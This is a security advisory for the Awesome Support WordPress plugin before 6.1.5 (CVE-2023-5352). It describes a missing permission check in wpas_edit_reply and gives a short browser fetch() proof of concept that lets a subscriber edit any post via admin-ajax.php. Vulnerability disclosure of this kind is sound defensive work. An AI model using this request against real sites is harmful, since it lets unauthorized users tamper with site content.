Lucene search
Krzysztof Zając (CERT PL)WPEX-ID:D32B2136-D923-4F36-BD76-AF4578DEB23BHistoryOct 16, 2023 - 12:00 a.m.
Awesome Support < 6.1.5 - Insufficient permission check in wpas_edit_reply
2023-10-1600:00:00
Krzysztof Zając (CERT PL)
26
insufficient permission check
subscriber role
admin-ajax.php
Description The plugin does not correctly authorize the wpas_edit_reply function, allowing users to edit posts for which they do not have permission.
Log in as a subscriber and run the following code in the browser, setting the reply_id to any post ID.
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},
"body": new URLSearchParams({"action": "wpas_edit_reply", "reply_id": "1", "reply_content": "hello"}),
"method": "POST",
"credentials": "include"
});Related
cvelist
cvelist
prion
prion
Code injection
2023-11-06 21:15:00
cve
cve
CVE-2023-5352
2023-11-06 21:15:09
wpvulndb
wpvulndb
Awesome Support < 6.1.5 - Insufficient permission check in wpas_edit_reply
2023-10-16 00:00:00
nvd
nvd
CVE-2023-5352
2023-11-06 21:15:09
6.6 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
14.2%
Related for WPEX-ID:D32B2136-D923-4F36-BD76-AF4578DEB23B